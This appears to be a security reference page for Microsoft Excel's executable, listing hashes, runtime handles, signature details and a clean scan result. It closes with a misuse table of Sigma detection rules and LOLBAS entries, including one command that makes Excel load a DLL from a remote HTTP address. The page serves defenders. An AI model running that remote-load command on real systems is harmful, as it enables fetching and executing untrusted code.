EXCEL.EXE
- File Path:
C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE - Description: Microsoft Excel
Screenshot
Hashes
| Type | Hash |
|---|---|
| MD5 | 3003BFEBF21C97DEA1FAC436BABCCFFA |
| SHA1 | 1319B94DB6992691A918829373E9F5139EADEE52 |
| SHA256 | 00D8FCDB9E2B315BFFF3D16FFB2F50ED55A64A84BF2F0E1127BD476ADD58705F |
| SHA384 | 229CA2807347AFB0D882C55CE00021600A4E046AA835E670CACF5B3C1F7B29611851549A8F5FD579AE74DB22F358F944 |
| SHA512 | B2339CC34E1C45034E3776D007E6BA5F1B94DE8B1827008FBC14F1A7AF7E506B2952098E033B62B9BCAA931D29F51CB72D44064F8AFDC5A26231B52C448B065A |
| SSDEEP | 786432:FL3CjxyO885kaEYAg4HV9N/+DJtste99aOjg7zznUikcvKzGri:FLSFyO885kaEYP4HVb+DJtstefa6g7cK |
| IMP | 0EDEE5E175F78644C9182A41C9B960D8 |
| PESHA1 | E72B55B473D77B4FAE8A45EFD3FDDE3320487491 |
| PE256 | C5DA3915FA28081E6738DE32E88634E543B843DAE73D726B438DADC1DC429033 |
Runtime Data
Window Title:
Excel (Read Only)
Open Handles:
| Path | Type |
|---|---|
| (R–) C:\ProgramData\Microsoft\Office\ClickToRunPackageLocker | File |
| (R-D) C:\Windows\Fonts\StaticCache.dat | File |
| (R-D) C:\Windows\System32\en-US\crypt32.dll.mui | File |
| (R-D) C:\Windows\System32\en-US\d2d1.dll.mui | File |
| (R-D) C:\Windows\System32\en-US\dnsapi.dll.mui | File |
| (R-D) C:\Windows\System32\en-US\KernelBase.dll.mui | File |
| (R-D) C:\Windows\System32\en-US\mswsock.dll.mui | File |
| (R-D) C:\Windows\System32\en-US\propsys.dll.mui | File |
| (R-D) C:\Windows\System32\en-US\Windows.Security.Authentication.Web.Core.dll.mui | File |
| (R-D) C:\Windows\System32\en-US\winnlsres.dll.mui | File |
| (R-D) C:\Windows\SystemResources\imageres.dll.mun | File |
| (R-D) C:\Windows\SysWOW64\en-US\user32.dll.mui | File |
| (RW-) C:\Users\user\Documents | File |
| (RW-) C:\Windows | File |
| (RW-) C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.488_none_11b1e5df2ffd8627 | File |
| (RW-) C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.508_none_429cdbca8a8ffa94 | File |
| (RWD) C:\Windows\Fonts | File |
| (RWD) C:\Windows\Fonts\segoeui.ttf | File |
| \BaseNamedObjects__ComCatalogCache__ | Section |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000a.db | Section |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db | Section |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2 | Section |
| \BaseNamedObjects\F932B6C7-3A20-46A0-B8A0-8894AA421973 | Section |
| \BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 | Section |
| \BaseNamedObjects\NLS_CodePage_437_3_2_0_0 | Section |
| \BaseNamedObjects\windows_shell_global_counters | Section |
| \Sessions\1\BaseNamedObjects\10FM_ACB_S-1-5-5-0-257318 | Section |
| \Sessions\1\BaseNamedObjects\10FM_ACBBD_S-1-5-5-0-257318 | Section |
| \Sessions\1\BaseNamedObjects\1958HWNDInterface:75031c | Section |
| \Sessions\1\BaseNamedObjects\UrlZonesSM_user | Section |
| \Sessions\1\BaseNamedObjects\windows_shell_global_counters | Section |
| \Sessions\1\BaseNamedObjects\windows_webcache_counters_{9B6AB5B3-91BC-4097-835C-EA2DEC95E9CC}_S-1-5-21-2047949552-857980807-821054962-504 | Section |
| \Sessions\1\Windows\Theme64749523 | Section |
| \Windows\Theme1120315852 | Section |
Loaded Modules:
| Path |
|---|
| C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE |
| C:\Windows\SYSTEM32\ntdll.dll |
| C:\Windows\System32\wow64.dll |
| C:\Windows\System32\wow64cpu.dll |
| C:\Windows\System32\wow64win.dll |
Signature
- Status: Signature verified.
- Serial:
33000002CE7C9ACE7D905ED2B70000000002CE - Thumbprint:
B10607FB914700B40F794610850C1DE0A21566C1 - Issuer: CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: Excel.exe
- Product Name: Microsoft Office
- Company Name: Microsoft Corporation
- File Version: 16.0.12527.20482
- Product Version: 16.0.12527.20482
- Language: Language Neutral
- Legal Copyright:
- Machine Type: 32-bit
File Scan
- VirusTotal Detections: 0/70
- VirusTotal Link: https://www.virustotal.com/gui/file/00d8fcdb9e2b315bfff3d16ffb2f50ed55a64a84bf2f0e1127bd476add58705f/detection/
Possible Misuse
The following table contains possible examples of EXCEL.EXE being misused. While EXCEL.EXE is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
| Source | Source File | Example | License |
|---|---|---|---|
| sigma | godmode_sigma_rule.yml | - '\EXCEL.EXE' |
DRL 1.0 |
| sigma | sysmon_suspicious_dbghelp_dbgcore_load.yml | - '\excel.exe' |
DRL 1.0 |
| sigma | sysmon_susp_office_dotnet_assembly_dll_load.yml | - '*\excel.exe' |
DRL 1.0 |
| sigma | sysmon_susp_office_dotnet_clr_dll_load.yml | - '*\excel.exe' |
DRL 1.0 |
| sigma | sysmon_susp_office_dotnet_gac_dll_load.yml | - '*\excel.exe' |
DRL 1.0 |
| sigma | sysmon_susp_office_dsparse_dll_load.yml | - '*\excel.exe' |
DRL 1.0 |
| sigma | sysmon_susp_office_kerberos_dll_load.yml | - '*\excel.exe' |
DRL 1.0 |
| sigma | sysmon_susp_winword_vbadll_load.yml | - '*\excel.exe' |
DRL 1.0 |
| sigma | sysmon_susp_winword_wmidll_load.yml | - '*\excel.exe' |
DRL 1.0 |
| sigma | sysmon_apt_muddywater_dnstunnel.yml | - '\excel.exe' |
DRL 1.0 |
| sigma | win_office_shell.yml | - '*\EXCEL.EXE' |
DRL 1.0 |
| sigma | win_office_spawn_exe_from_users_directory.yml | - '*\EXCEL.EXE' |
DRL 1.0 |
| sigma | win_susp_msoffice.yml | - '\excel.exe' |
DRL 1.0 |
| sigma | win_susp_powershell_parent_process.yml | - '\excel.exe' |
DRL 1.0 |
| sigma | win_susp_regsvr32_anomalies.yml | Image: '*\EXCEL.EXE' |
DRL 1.0 |
| sigma | sysmon_cactustorch.yml | - '*\excel.exe' |
DRL 1.0 |
| sigma | sysmon_suspicious_remote_thread.yml | - '\excel.exe' |
DRL 1.0 |
| LOLBAS | Excel.yml | Name: Excel.exe |
|
| LOLBAS | Excel.yml | - Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office\Office16\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office\Office15\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office\Office14\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office\Office12\Excel.exe |
MIT License. Copyright (c) 2020-2021 Strontic.